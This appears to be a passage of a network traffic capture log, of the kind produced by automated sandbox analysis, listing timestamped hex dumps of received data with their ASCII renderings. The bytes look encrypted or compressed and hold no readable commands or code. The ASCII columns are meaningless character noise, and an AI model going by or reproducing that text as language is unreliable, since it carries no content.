                                                                          2023-09-19 07:21:50 UTC41INData Raw: 60 62 bd c8 04 92 42 12 f6 4b ea 11 ee 39 af 83 fc 7f 46 e8 f8 dc 21 de 28 1b 26 59 11 93 2a c2 bf 46 b7 3d 1d 27 ea 7e 83 02 41 01 b0 01 5a 8e 80 35 13 41 d2 6c b1 3d 9c 88 23 3a fb 70 b6 b7 38 6b 1d ef ee 05 a4 75 71 02 2f 8f e3 22 2e 1c 0a 45 1d 78 ba 36 53 22 29 ee 90 17 e3 c9 9e 59 67 66 09 d9 10 e7 e9 e1 23 20 51 b9 1a f2 dc 00 3a 2a f7 15 a7 8b 6e eb 93 8d 44 65 ac d1 7b 02 04 0c 18 97 58 3c fb 1f 09 60 f5 1e 94 7b ea ca 5a da 59 73 03 15 8e cb e5 f6 74 72 2d 80 30 25 23 f1 78 64 d0 88 69 48 e6 13 9e 65 89 7a 50 5d 9d c7 6e e8 aa 75 ac 69 61 43 1f f2 f8 5e c0 4b 9d 45 c8 1a 8e 84 aa 98 7b 45 4c f6 31 dd 53 70 44 7b cd 30 3d c0 b0 8a 76 32 67 f7 cf 74 0e 2c 7a 75 63 72 19 fb 33 6e 3d 04 e6 38 a2 33 bd 3f d2 62 1b be f2 22 d0 b6 7a 4d 20 2e 1e cd e9
                                                                          Data Ascii: `bBK9F!(&Y*F='~AZ5Al=#:p8kuq/".Ex6S")Ygf# Q:*nDe{X<`{ZYstr-0%#xdiHezP]nuiaC^KE{EL1SpD{0=v2gt,zucr3n=83?b"zM .
                                                                          2023-09-19 07:21:50 UTC43INData Raw: bf ee 0b ab 8b fb 62 c5 82 55 d9 bd 52 45 13 f9 0b 38 4e 94 bc e5 5f 07 83 dd 84 eb 90 10 11 d9 55 94 96 b5 77 06 a4 63 ac f8 07 ea 54 58 4b 1e 92 85 68 a3 d3 58 cc 77 da e0 f6 8d d6 02 a6 e7 a8 c0 95 1a e6 ea 60 be 67 69 48 fd fc 76 f8 66 36 b2 15 f2 2c aa 6e 77 a6 14 56 dd 78 b8 ea cd 77 c6 0f c3 96 c1 65 ee 03 26 0e 8a 85 53 9c b2 89 c6 0e 66 f7 b5 28 4e 5c 15 79 1a a0 8c 8f 14 6f b1 b6 8c 02 42 b8 9a 5c db c7 ee 92 2f 78 8f 9e cc 23 3d bc 24 71 a2 62 d1 60 1d 1c e2 dd a1 67 56 f1 76 8f 9f a7 8e 19 25 07 32 89 f4 32 c6 4b 9a d2 01 c1 74 82 48 24 dd 8d 75 f5 5a d1 9a 88 a9 60 0d 76 02 4e 5d 17 16 a7 7e 42 7e c2 71 8b 56 7d 8a ba 85 23 2c f9 82 4e b8 5c 7d 3c e6 0a 9a a8 55 bd 1f 83 00 bf c8 b3 95 60 23 16 d7 95 39 1f 5d 16 dd 70 92 ca 89 25 c4 46 d1 f0
                                                                          Data Ascii: bURE8N_UwcTXKhXw`giHvf6,nwVxwe&Sf(N\yoB\/x#=$qb`gVv%22KtH$uZ`vN]~B~qV}#,N\}<U`#9]p%F
                                                                          2023-09-19 07:21:50 UTC44INData Raw: a9 d7 4c 9b c1 be e5 de 87 a8 d9 35 e2 54 9c 91 13 13 22 71 33 03 31 59 17 69 68 67 5b 83 e7 05 a0 13 85 4c f6 c8 8d ac eb 94 56 da 39 9e 60 eb 5a b4 ce 9c 93 47 ac 3b cd de b6 cf 97 06 b0 37 a3 50 4e b1 61 5e 2a c7 1d 2d 45 71 cf 89 b5 06 40 76 c8 4f 60 fd 71 37 cc 27 47 b4 c6 2c c4 1e 50 cb dd 74 d7 6b 4e 69 98 66 b7 a1 ba 67 17 cf cf 22 95 c4 c8 94 dc 94 1f 63 ac 01 1d bc d1 d1 b9 eb 1f cc b1 86 e6 a3 95 5e 06 9b f9 cf e6 81 3e c2 1a 83 20 3d b6 8c bf 0f 6d dd 8a 61 38 18 df 53 32 72 bf 74 26 b5 3c 0c 37 a0 e3 74 3d b9 bb 7b fa ce 90 e6 10 d7 77 24 d0 ee 0f f5 1e ef ef 94 35 f9 48 39 79 fc db 71 60 eb d4 48 b8 03 88 4b 53 71 6d 16 81 10 e4 10 3b 9f 80 26 43 a1 b9 c3 04 a5 7b c6 8d e0 1a a0 3b 55 b1 c1 5c 0f c3 74 2d 7a cc 0b 14 f3 2e 31 88 32 de ca 39
                                                                          Data Ascii: L5T"q31Yihg[LV9`ZG;7PNa^*-Eq@vO`q7'G,PtkNifg"c^> =ma8S2rt&<7t={w$5H9yq`HKSqm;&C{;U\t-z.129
                                                                          2023-09-19 07:21:50 UTC45INData Raw: d5 7f 4e a4 ce 9e 0b 5d c4 08 0c 2f 5b c4 63 d3 c7 c1 0c 00 6d e7 99 1a 00 b5 74 3b 2b 9e 2b 43 a5 09 3d a0 4e e2 0c 32 b9 24 18 2c 55 e5 d1 04 82 66 91 72 5f 69 b9 ef a1 32 e3 9b 51 65 b7 58 52 c3 63 fe 24 48 b1 b6 a8 c2 a8 5a d8 cc 8e 03 8a c5 a6 1f 8d c3 c0 0f 12 25 80 77 37 1e 92 46 f8 94 91 62 cc 2a 9a 7f c8 da 02 9d 7c 10 57 ab b6 af a3 65 3d ac eb dc 62 47 e9 9d 60 d7 d7 0a 3b 14 20 24 ae d9 b1 36 75 bb 4c c9 18 47 58 d3 d5 b5 77 bf fd 19 d7 2e 69 36 2d 61 38 b5 2c 72 11 1f 36 3f 6c 20 2b cb 49 1c 67 b1 b6 c5 97 a4 cb 58 0a 8e d6 9b 6c 4f d4 2b c0 48 70 2b 68 9f d3 a1 98 64 1c 22 4d 6b c1 f0 1f ed bb ae 79 7e 0c b6 7f 51 4c 8a 78 f1 98 ca 1b a9 e5 31 b2 2c 80 12 00 97 30 6f c4 34 ef 06 b5 c7 e4 dd 4f d7 05 75 7f 32 ee 2b cd 6e 80 3f 7c c6 25 64 e9
                                                                          Data Ascii: N]/[cmt;++C=N2$,Ufr_i2QeXRc$HZ%w7Fb*|We=bG`; $6uLGXw.i6-a8,r6?l +IgXlO+Hp+hd"Mky~QLx1,0o4Ou2+n?|%d
                                                                          2023-09-19 07:21:50 UTC47INData Raw: bd ca da 0b 58 90 cf 74 e5 89 f8 8c c1 bb 46 df 56 69 18 70 1b 38 42 2b ee 51 52 2d 9b bf 6c 69 a4 88 83 19 64 88 50 23 6d f0 55 85 86 2a 85 32 49 bf 1d 14 d3 c7 ee ae 59 dd 11 58 10 28 71 84 eb b0 5a 97 01 52 c9 ef 2b 58 61 4c e0 bb af 6c 64 5d 07 26 64 8e aa 7c 7b ab c2 f3 f2 de d2 24 c8 d3 8a 1f 43 59 2b 5d 17 1d 7f 47 2f 01 f6 0c 57 03 a4 c5 24 9d 4f 9f 48 4c 8e bb ca 80 4e d3 df 6e b4 8f ff 4a 49 d0 11 4e 61 73 0b 0c 0e db b7 29 ee 1f e3 79 a8 24 25 8d 84 7a 25 35 bd be c5 c8 83 31 ec 84 bc 03 77 16 9d 7c c8 71 ed 92 84 9e 65 06 37 aa 44 19 b4 16 a1 2a 32 da 9d ee ff 33 e3 f8 1f d9 42 ed 11 23 a7 05 b3 47 e4 a4 97 99 4c f0 7f a4 79 82 b3 0e 0d 0a 66 47 09 fb 5a a2 85 da 16 38 c2 eb 07 12 6a 60 21 82 e4 c0 7f 3b 45 05 2b 8d ef e9 c7 09 cf aa 63 38 b0
                                                                          Data Ascii: XtFVip8B+QR-lidP#mU*2IYX(qZR+XaLld]&d|{$CY+]G/W$OHLNnJINas)y$%z%51w|qe7D*23B#GLyfGZ8j`!;E+c8
                                                                          2023-09-19 07:21:50 UTC48INData Raw: 9f c5 0b 4c 59 5f b7 d1 c2 f2 e8 fb 01 c4 37 3e 3d 37 8f 3c b9 07 2a 72 dd b1 04 d3 0b d8 63 42 14 a2 79 ee 67 bf 35 2d 6f c1 d2 fd f6 a5 e2 ea a2 05 8a ac bc 1d 89 d8 2d 3f 5c 53 71 8b db 31 a5 dd d3 5b 0d 9f 77 c3 71 82 cc 68 47 fc c8 d0 86 20 b5 98 0d 7c c3 1c 04 4a ed 1a ee 1d 91 21 9f 70 e2 ac 28 20 05 5d 79 bc 48 74 77 99 91 5c ee 4a 6f e3 45 28 eb 4b f9 de 09 a8 8b 72 f5 c2 01 32 68 8a 6c 14 62 9f cb 3c 17 9a 07 db 38 f9 2b ab 4c e0 67 e7 70 d2 41 97 10 49 3f 7e 69 52 ec 87 11 cb 99 a5 9b 92 d0 a2 f0 3e 55 52 a5 97 9c 61 ec 37 d5 01 e8 fe c7 cc fa 87 b4 71 8e d8 13 db 88 de fc 42 bb e2 08 5c ef fa f5 62 0b ca 18 6b 02 c7 9a 7a 80 bb 8a 31 56 88 0e 44 6e cb 31 3e a0 cf ba dd b5 51 74 13 24 d7 8d d9 69 fb 74 d4 22 02 28 2d 02 51 38 77 33 e5 91 3a 56
                                                                          Data Ascii: LY_7>=7<*rcByg5-o-?\Sq1[wqhG |J!p( ]yHtw\JoE(Kr2hlb<8+LgpAI?~iR>URa7qB\bkz1VDn1>Qt$it"(-Q8w3:V
                                                                          2023-09-19 07:21:50 UTC49INData Raw: 2d c4 af cd 23 eb e7 e8 fc da 67 ad e1 e1 1a f6 c0 43 4e af bc 15 ad da c4 d9 a0 19 a0 29 50 11 d3 81 37 62 e6 90 0a 0c 43 46 85 33 40 cd 7d 92 8a ef 0b 08 09 06 ce cd d0 fc fd 2d 9f 95 f7 a6 95 0a c3 e5 bf 1f 18 c4 fa 3c 6c 44 26 bf 33 cd 4b dd 26 e5 af 5d 4d 47 30 f5 e1 f9 82 f2 ff 6f 51 01 cf b6 6c 48 9c 08 0f 10 fc 42 cf 20 b7 a7 cf 28 85 88 08 b0 12 98 1c 87 8f f5 b4 a9 93 46 3e b8 33 93 c6 8f dd c4 81 9e 5e 8c b1 46 cb 77 89 aa e8 ef 81 83 78 d9 fe 16 ef 43 16 f2 65 b6 61 c8 e1 b0 8e 43 66 a5 b0 b3 63 51 3c 28 21 c0 96 13 67 0a e7 6e 6e ec 10 32 aa 59 87 38 fd bf d8 4f 73 7b 50 fd 6b 44 cf 32 63 21 9c 5c 38 bd 9a be 97 97 f4 02 2e f3 ca a2 6b a8 ff 55 46 dc 7e ae f8 43 0d 24 c4 50 45 16 be d5 7b c9 3e b9 b8 86 fb 11 3f 7c b3 15 8a 5d a8 ac 72 a6 4a
                                                                          Data Ascii: -#gCN)P7bCF3@}-<lD&3K&]MG0oQlHB (F>3^FwxCeaCfcQ<(!gnn2Y8Os{PkD2c!\8.kUF~C$PE{>?|]rJ
                                                                          2023-09-19 07:21:50 UTC51INData Raw: 3c 59 48 ec dd b4 95 45 f5 19 5c ed 45 04 57 39 3d fd 7d bc 41 b1 3b b0 a7 75 ff 60 a5 c9 4f 85 81 72 ac 5c b0 5d 9b 2f 26 fb 5f fc 98 57 e5 30 8f dc 41 08 65 f0 6d a2 b3 ed 1c 94 ea 28 d0 14 b5 f5 14 cc be 64 8d 2c 1d 49 0d ac 62 71 66 0c 92 82 2c 52 dc bb f9 c6 8b 17 ad f9 32 03 f0 31 3f 3e 0f 3f 34 db c0 b9 90 fd 6d 20 23 cc f1 84 47 82 66 c5 68 41 9c 80 9e 5e 1b 22 65 72 08 5e 05 66 07 54 9e 2d ef 3b a1 56 5f 5a eb 57 01 66 e3 5e a8 3c 17 eb b4 a1 1c ef 6a 19 82 2b 42 aa ac 3c 78 a0 a4 81 52 eb cd a3 cc d7 5b b3 76 c3 e6 15 10 ed 1d 04 37 c9 4a 3a da 11 7b a7 93 98 2e 81 86 d8 08 43 7e 26 e0 e6 00 01 5b 1a 3c 03 cb 9c e7 3a 9e 86 57 f2 6a 83 bc 87 cb 6e 06 dd cc d9 cd 66 aa f9 18 d5 ec 97 d2 1d 41 2a 5a cf 02 8d fb c4 4c 4e 3f b0 b4 67 f9 5f 53 27 5b
                                                                          Data Ascii: <YHE\EW9=}A;u`Or\]/&_W0Aem(d,Ibqf,R21?>?4m #GfhA^"er^fT-;V_ZWf^<j+B<xR[v7J:{.C~&[<:WjnfA*ZLN?g_S'[
                                                                          2023-09-19 07:21:50 UTC52INData Raw: 69 ad 90 24 aa 3f 06 92 3e ca d7 ae 7e 82 45 eb 80 c5 69 ee 3a 84 a0 bf 3e b7 ea b1 ce d0 30 3b 23 d1 1a d8 8e 10 0b 88 a3 e2 ed 89 a3 ff ab 05 2a 8c 79 22 fb 6a a1 a4 cf c9 7b 99 15 e9 11 5e d9 7a 07 4f f4 e5 bd 7b 75 e7 0c 6b 95 43 01 b7 e0 ef 63 fd 0b 51 e6 ab 70 b9 ae f6 e9 d7 b1 d6 15 e1 73 82 9a c9 a7 f3 39 de c6 1d e9 b4 04 90 37 88 7d 68 93 79 35 71 02 8c f5 d0 a2 69 6a 48 86 d7 9a f8 0a 36 61 e7 0f 27 0c 18 a1 c5 ed 9e 94 97 59 37 0f 09 e1 fb 14 f6 68 46 b1 b9 fc 10 4e 97 4b 8f 05 90 5c e2 53 0d 5e 08 59 75 66 43 32 1a ba 57 53 93 70 01 cb b7 48 c9 aa 97 57 cc 03 e7 0d cb 72 f2 ac d6 26 65 39 f2 13 18 b3 5b d3 d3 6b 71 ef 3a 5c 18 f6 35 56 5f a1 73 09 c8 19 b3 65 01 7e a4 f5 34 08 c2 0b d9 1f 37 7a 8c 25 41 9e 95 c8 67 e6 bf bb 85 02 87 e9 8a d0
                                                                          Data Ascii: i$?>~Ei:>0;#*y"j{^zO{ukCcQps97}hy5qijH6a'Y7hFNK\S^YufC2WSpHWr&e9[kq:\5V_se~47z%Ag
                                                                          2023-09-19 07:21:50 UTC53INData Raw: f8 40 ee 24 fc d2 b8 ec fd 56 cb a8 fd a9 26 0e 04 de d9 9b 2c 8d e5 d1 de 97 54 2f 3a bf e8 5c a5 0c 3b d5 16 10 2a 60 e0 fc 8d 34 66 4c 69 d3 58 d9 41 c8 f7 a2 15 ca 46 e4 69 1e 3a 91 55 cb 33 66 c6 a9 07 b8 39 f9 c2 be 2b 06 5c e6 c9 78 8e cb d6 ee c6 d0 84 a6 f0 34 f8 bf 5a 70 e9 19 9b 48 eb cf b7 e7 2b 4a 9d 06 5c cb df b3 59 e4 52 7f d2 1b 0b 59 71 05 06 b1 94 48 c3 1c e6 b8 db 40 da e2 22 6e 93 0f 17 c5 6b d2 10 1c dc 9b be f1 db cf 78 a8 91 d3 4d 87 99 9d 15 d2 cd 5a 7c 2e 14 61 14 b2 d8 6e 68 a9 71 e3 32 20 41 95 ed 69 47 c9 25 e8 c4 60 dc 66 16 c2 1b 69 7e ba 06 69 5a a5 42 98 b0 4b 13 c7 ce a2 a8 ac 81 b8 ff 16 f1 21 e0 72 2e dd 44 72 bb 37 14 76 3e 98 3f 8d b5 6d a4 1f 62 72 5e 1c ea a7 d3 d9 18 43 cc 21 26 d5 df 70 09 8b a5 46 c1 e2 9a 84 34
                                                                          Data Ascii: @$V&,T/:\;*`4fLiXAFi:U3f9+\x4ZpH+J\YRYqH@"nkxMZ|.anhq2 AiG%`fi~iZBK!r.Dr7v>?mbr^C!&pF4
                                                                          2023-09-19 07:21:50 UTC57INData Raw: 0f a6 c1 7f f4 c8 09 94 c8 72 a3 61 02 95 dd 94 a0 cd f6 87 d1 39 39 2e 44 65 1d ad dd 5b 18 fd 1f f4 4e c6 8f bb 9b a2 3b de 41 7d 14 77 59 ac 72 e5 f0 e3 8b 50 dd b3 60 18 6c 28 c8 65 f1 da 35 42 ba 55 79 f9 bb df 9c 6a 03 7c 7a c6 12 ef cf b8 38 cb 34 74 c2 5d a6 ab bf 68 1f 91 a0 3c 7f 6a 86 c3 1e 07 35 55 62 df b6 ea ad d3 d7 15 e4 a5 55 77 ed 58 66 17 4d 7d 80 93 d6 99 0c 6e 42 5d d0 19 46 03 24 da 11 85 de df 81 24 1d 05 c8 2a 32 f3 f0 bb 6f f6 96 3f 99 56 bc 41 4e 72 27 9a db f4 b6 3e 2f eb b2 12 dc 86 f4 d5 a7 ea ea a2 33 bd 66 66 37 c8 2b cb 94 de f7 e0 3f b1 c7 44 6a 3f 5c ff 23 dd 2a 27 01 c8 19 2f 22 02 57 d2 41 68 c6 e5 17 6f 91 31 8d 74 81 96 a3 fa 54 f0 f1 e6 6e 53 2e c6 7e 57 80 2c d6 4d 87 8a a5 64 56 81 06 ea 64 c1 bc d1 84 e4 56 f0 07
                                                                          Data Ascii: ra99.De[N;A}wYrP`l(e5BUyj|z84t]h<j5UbUwXfM}nB]F$$*2o?VANr'>/3ff7+?Dj?\#*'/"WAho1tTnS.~W,MdVdV
                                                                          2023-09-19 07:21:50 UTC62INData Raw: 9b 99 73 72 e3 65 5c 3c a1 09 67 33 03 86 3d 12 2c 0a e2 66 4e d6 b3 09 7d 59 d3 14 bd 8d a6 b8 86 bf 2c 22 ff 68 c1 ba 60 dd ca c7 2d 42 f3 d8 b5 0e 9b 3f d2 37 66 86 66 00 13 d6 7e 82 e9 88 a6 60 42 51 ff 27 ec f8 94 0c 4b 38 3b 9e 30 a0 1c 94 69 59 3c f8 83 79 11 36 02 ed c7 54 f8 e0 c1 a0 76 f1 7b 58 47 fb 81 ad e8 55 18 b3 94 14 fe 8f ec 43 03 02 73 13 cb cd f3 5c da bb a6 79 45 fb c9 91 cd 75 82 10 04 86 41 5b f1 e6 7a 2c bb 3f 40 5f f8 c6 a6 bc e3 c3 af 7d bf 52 06 2a 4f 76 bf de e2 2c c3 f9 d5 b8 dc 9d 65 5e 00 e0 72 5b 63 a8 93 07 91 67 0b a4 ad c6 00 f9 2b 66 84 99 7e 13 bb 77 05 e3 10 5d c4 b4 82 9b d9 6d c4 51 2a c9 bb 44 11 79 ea 91 55 37 52 32 02 6b 1e c1 71 a1 74 1e 62 d0 0c 50 c4 66 9d 32 b1 a6 98 07 6d 06 81 ef 02 d0 58 57 9a df be 8f d0
                                                                          Data Ascii: sre\<g3=,fN}Y,"h`-B?7ff~`BQ'K8;0iY<y6Tv{XGUCs\yEuA[z,?@_}R*Ov,e^r[cg+f~w]mQ*DyU7R2kqtbPf2mXW
                                                                          2023-09-19 07:21:50 UTC65INData Raw: 55 23 e8 ea b8 93 8e bb 67 89 43 a2 41 7b a5 32 06 fe 9f df e5 da 40 89 ab fa 86 4e 21 27 37 3e c2 9a 88 fb 3c c5 fb aa 68 0f 01 a9 5d 93 90 e3 29 44 87 f8 3c 10 e8 61 45 65 d0 0c cd f7 d5 b2 69 f7 05 4f 7b e0 3c 63 c0 cc eb bc 38 b2 53 36 0b 18 7d d8 85 2b 11 dc 07 44 5e 3c f6 50 bd 9e d8 e5 e8 f0 86 0e 25 35 5e 25 9c dc ae 4a 72 c5 cf 74 a5 d7 bd 09 34 d5 73 be 98 a7 34 c6 11 8c aa 46 7b 85 06 59 a8 f1 b4 a4 a3 86 a2 1f 79 1f e2 91 3f 01 85 4c 38 fe 97 cf 67 6f 41 bc e2 82 79 44 c1 6f f6 10 86 7e fb 54 3c 2e c0 15 d7 17 8e 6e a5 5b 94 f3 f9 16 a0 a6 e2 bc 69 0d 3f 4f ac 6b f8 e5 4b b0 d2 89 47 35 57 32 6b 8e 59 5b 0d 49 46 ee 41 9b 68 2f 5a ea c6 16 03 4c 86 92 0a 36 2a 58 3c c6 c7 36 a5 ef 92 98 99 9b b7 d8 68 8a 5a 4a 4f 76 39 08 a2 34 21 71 27 c0 67
                                                                          Data Ascii: U#gCA{2@N!'7><h])D<aEeiO{<c8S6}+D^<P%5^%Jrt4s4F{Yy?L8goAyDo~T<.n[i?OkKG5W2kY[IFAh/ZL6*X<6hZJOv94!q'g
                                                                          2023-09-19 07:21:50 UTC69INData Raw: aa f7 f2 01 3e 1a c6 57 2d 22 f4 e9 e6 78 ac 7e 01 19 a7 41 6e 13 d5 ca 36 7b 37 56 0f 11 36 12 ae 57 b6 4d 73 db a7 86 01 d4 a0 9e 62 ef c7 8f 7e b8 d0 1e ea 7d 44 3d a0 e3 5c 1f 32 c5 7e 83 33 00 4c 2d a8 f1 c4 7c 40 1f 49 b3 5a 9c 83 a1 d9 96 34 44 53 e9 20 3a 22 9c 7f 13 9f d6 30 ce f6 e5 4e 4c 6d d3 f5 7d 98 4d ca ff 03 01 01 7f d6 74 cc 51 5d cf 64 a4 13 d1 a1 23 7d 5f 65 57 22 7f 23 58 5c d0 f5 23 d6 7a 5b 89 4b c3 f1 1e ce cd 4c 87 22 5f 5b b1 d7 76 9a 67 08 dc c5 97 a9 7a 44 75 c6 69 5f 5e 5b d3 ec 74 dd 6f fd 1d 56 46 7a f6 85 b2 78 c9 ce fe 6a 7a 46 78 0b 84 d7 b7 9a 1a 63 58 92 4f 12 7c eb ad 5a 93 fe 14 2a 16 d6 9e 63 40 14 dd b5 60 09 a6 04 f2 d4 56 0e 75 31 d9 17 81 aa 98 3d e7 bd c8 b9 c7 e0 51 b8 f5 7d 48 8a c5 9a 53 1e d4 f7 45 40 63 51
                                                                          Data Ascii: >W-"x~An6{7V6WMsb~}D=\2~3L-|@IZ4DS :"0NLm}MtQ]d#}_eW"#X\#z[KL"_[vgzDui_^[toVFzxjzFxcXO|Z*c@`Vu1=Q}HSE@cQ
                                                                          2023-09-19 07:21:50 UTC74INData Raw: 3c c8 b4 33 d4 22 10 cb 83 39 88 b7 8b b7 a6 30 2a d3 ee b5 7f 92 b5 33 cf 9c b7 dc 1c 99 1b b3 e1 16 bb a2 92 f4 18 c1 4a 86 2f bb be c8 1d bb f9 67 c6 d1 7e 99 bd 72 a9 49 06 f6 87 08 0a b4 f0 11 ae 61 e2 55 ae 88 11 01 8e 3d 9e 5b 16 5e 15 1e f9 a7 63 ec 6f bd d6 14 74 40 44 dd e1 6d 00 37 7a 66 b7 4a 31 e0 e9 f4 c6 f5 f5 de 14 fc 47 da 6b 80 f9 96 b6 7c 08 a0 fd 95 94 60 92 11 79 08 75 2f e2 4c e0 b7 20 e7 90 59 a9 dc 3e dc 38 bb 4b 24 57 b6 36 03 2e e8 4a ed b6 fb bc c2 dc 03 71 19 3a b0 ee 1a d8 d2 5c 64 b3 7d 01 ce 66 b3 68 cf 52 fa 97 36 36 c1 4b ed cc ee e3 d2 44 78 73 4e 28 be fa 13 c3 4c 9f 13 b7 da 37 7c 57 32 4c 8d 17 4e 53 49 98 73 c3 d2 ee af d7 93 02 6b 87 d2 5c fd f6 28 b5 b5 75 25 4b c1 ba 13 d3 ea c0 fc 61 41 73 ee de d7 8c 3a bb ef 09
                                                                          Data Ascii: <3"90*3J/g~rIaU=[^cot@Dm7zfJ1Gk|`yu/L Y>8K$W6.Jq:\d}fhR66KDxsN(L7|W2LNSIsk\(u%KaAs:
                                                                          2023-09-19 07:21:50 UTC78INData Raw: 0d 97 e2 bd 5d 72 5c e3 b8 6d b5 f7 57 69 92 2b 9a d2 4b 30 cd 93 fe ba 57 87 b5 68 64 a1 9b 6c 33 ee d5 cb ed 3c 89 06 da 36 2c aa 04 37 81 e8 27 5c 0b e9 01 6d 8e 14 5d 90 a4 8b ae bf 76 77 62 ca 21 7d 9d 0e cd 6c 82 3b e9 60 48 e5 bb 78 a7 fc 1b d4 56 75 87 a1 ab 92 84 42 50 48 23 af 86 30 3b b4 cb 93 85 1b 7d 73 2c 39 47 0c b2 42 22 a2 2a 79 96 a8 de 5a f9 aa eb 6a b6 be c9 c4 a5 6a 7b 62 a1 b1 5a e9 a4 24 9c 1c 26 72 5b d1 a8 ae 91 2f 1f d6 25 7a d6 06 6a ef 4b 3d 8f d4 ac 95 b4 52 8e d7 99 87 c5 59 77 1a 6d b6 15 99 24 4e 33 79 b4 dc 9d 3d f1 be 46 8b 8e 5d dc 93 46 8a b0 b5 ed 4e fd 15 8f c6 cc be fb ca 5f 78 c3 da ab 4f 7a de db 23 63 5e c9 cd c9 5b 44 21 54 72 de 08 e4 2d c1 a5 c6 d5 c3 db de b4 44 68 91 fb d5 ec 30 34 db e0 c3 3f 07 77 91 93 1e
                                                                          Data Ascii: ]r\mWi+K0Whdl3<6,7'\m]vwb!}l;`HxVuBPH#0;}s,9GB"*yZjj{bZ$&r[/%zjK=RYwm$N3y=F]FN_xOz#c^[D!Tr-Dh04?w
                                                                          2023-09-19 07:21:50 UTC82INData Raw: a4 0e 1f 6c 11 55 53 22 3c d7 3b 0d d9 53 53 2a 40 70 26 a4 d2 e9 f7 5a ae 39 a2 d1 fb c0 ec 1d 0b cb e1 76 a3 1d 9e d1 77 06 bb 8d 77 dc e7 1b cc 8d 72 16 d3 38 58 4e f7 4a 57 75 30 aa d6 9a 28 fd b2 93 e4 85 67 fb ce a3 2b af b5 d8 b6 94 e9 9e 72 7f 4d e6 e6 5b f3 c0 e6 ec b7 05 9e 55 34 a1 e1 d9 91 2a 1f 18 f9 60 f9 c9 fe ec 55 9f 0a d0 a8 1c e5 e3 0c d3 54 01 01 b1 c6 6e 46 10 80 e3 42 57 e5 5b 3e a3 2e f1 5d cc 47 f5 ab e4 1e 6e b7 b5 b8 ff 80 15 c4 bc 03 20 9c 33 6f 92 32 d8 9f c5 28 6e 89 07 e2 47 7d 90 8e f6 b8 e9 1b b4 8f 6c 9d 0b b7 0a b8 03 c8 f3 7e d3 54 4e 5d de c1 ef e7 67 8f 4b 0d 94 93 0a 4a 99 a8 5c 8d 42 9d 21 0a cb 97 6f 92 18 c2 b9 7d b5 d2 b3 32 9c 1a 3a b4 4d 98 bb b6 de 98 be 11 f8 01 3b e5 41 2f 1d 3d 3c 9a 3c 3a 2d a8 b5 96 ca 51
                                                                          Data Ascii: lUS"<;SS*@p&Z9vwwr8XNJWu0(g+rM[U4*`UTnFBW[>.]Gn 3o2(nG}l~TN]gKJ\B!o}2:M;A/=<<:-Q
                                                                          2023-09-19 07:21:50 UTC86INData Raw: 15 58 0b 0a a4 ad 01 da df b7 d2 a0 c4 f3 e7 a7 cc e5 ed db 59 bf 28 96 bf 7c e0 c1 44 e0 1b c6 15 04 3d e9 91 f2 69 af 0f 03 c2 db 25 53 d9 0e d2 e2 16 8b 5b 8b 90 30 52 52 03 62 78 8f 61 ce 64 6d a7 9d 89 38 fa 50 87 ae 55 87 8d e8 91 7e 54 1b b9 5b a1 77 2f 99 c5 58 dc e9 39 7e 11 e6 be c7 ae 92 71 6a 02 dc f4 ab 69 4a 6e 76 df 14 01 b1 2a a2 47 b0 2a e1 b1 23 25 c2 b8 3e 87 e5 35 d0 ab 79 56 e4 6b 14 d4 b3 0a 72 1f a8 a0 29 41 0e f7 2f 47 0c 35 8f 5b 8a 39 e9 a9 72 92 ea f5 e5 c9 ce 30 df 6f 03 2c 4e 9c 13 77 03 89 e8 3f 3b 3e 8c 88 40 93 40 f1 0f 43 f5 7d 62 f3 6d 83 00 47 dd 65 d0 8f a0 0e 04 ef dd 3f 02 a1 d8 53 b1 2e 8f 8d 1d 94 cd 4d 4d 4b f6 8d eb 89 2f d4 8c 21 f7 c3 db 00 89 10 30 45 ab 8b d5 68 2b 9e 0a e7 c5 ce 32 b8 3d c3 48 17 bd 40 d8 6a
                                                                          Data Ascii: XY(|D=i%S[0RRbxadm8PU~T[w/X9~qjiJnv*G*#%>5yVkr)A/G5[9r0o,Nw?;>@@C}bmGe?S.MMK/!0Eh+2=H@j
                                                                          2023-09-19 07:21:50 UTC90INData Raw: 68 b9 52 be d5 40 b9 32 10 1a 57 81 15 88 d9 0b e4 7b 4e a8 65 32 cc 79 11 87 c8 2e 3f 9e 62 1a ff 5d 3a b0 06 cf e5 f5 23 31 c1 d3 09 79 08 3e f0 8c e2 cb 33 4c d0 7b 8a 5f 77 55 3f be fa ec 69 d8 8a 2a 3f 00 d8 3a 51 ac 2c b5 73 8b 6e ee b4 9c 5e 9e aa bf 16 7b fa 86 83 69 24 c9 a2 af c9 eb 97 69 12 6f cc 35 c7 e6 36 a6 b5 9c ef 95 af 4a 92 05 b8 91 34 b3 50 c4 a0 c8 ff a3 6f a7 b5 70 96 05 5a 13 90 ee 02 dc db a0 9a 4e 55 b8 dd 48 00 51 cf 76 d0 8d 07 c9 15 a6 71 9d e7 c7 81 d7 9a 02 11 d3 0c d0 3c eb df 87 91 ff fe 52 09 62 c2 7d 3e fe 46 1f b2 f6 46 37 c5 2b 34 09 93 69 34 5c ac d8 e9 a0 76 18 16 a3 ca c7 48 64 21 07 34 8a c5 97 34 52 56 99 ee ab 8a 5c a6 92 94 53 67 d5 c2 84 bd 45 93 d7 0c 6c 68 68 52 5b 85 5d e9 fb 6f 20 f3 13 b0 8f dc 08 12 b2 8a
                                                                          Data Ascii: usrU,wE}]gIxIUb^XEYYVi$']~rCqV7s|^eqtvs:`3myFuR@>LFh>-(}VhD({j`gl1|^p(zMb.Z4M)nSs
                                                                          2023-09-19 07:21:51 UTC273INData Raw: 3b 44 79 49 9a 3c b6 0e 2b 42 3b 28 9e e5 76 db 45 f8 03 ea 6f 41 4d 2a 63 1e 4d 7c 71 b6 2a 23 c9 63 86 ee 56 2c 18 5b 73 43 d2 e0 c5 b8 a5 7a bc 8e dc 76 51 d1 69 de 5f 20 67 86 23 fc e9 92 27 1a 2a 5d 02 5e 6f 69 33 64 3b a3 ad 7a 18 b2 7b 84 98 11 74 f3 b0 a7 d0 05 1c 42 3a a8 b7 48 37 71 3c d0 11 06 43 74 3f c1 26 96 40 26 4f 84 ca 95 85 94 f6 39 64 dc 48 ba 58 b8 33 26 e3 67 a8 80 8f a7 d0 91 bb 26 ab 7c 61 02 d3 7a b0 eb 2f 9d 56 08 f3 f0 05 da 6f 1e 4a 9c 95 4d f1 d5 03 bf 81 12 50 02 f3 87 32 75 32 fe de 7a df c5 82 f9 35 45 b9 f8 0e 8b 7f b4 4b ce 1b 49 7c e2 1b 88 41 41 17 59 88 ed c3 da 37 4a 74 b5 1b 9f 7c aa e1 b8 6b ea 30 9a 4d 6c 9e 3d a3 c2 04 92 e3 f8 0c 67 f5 bf aa 95 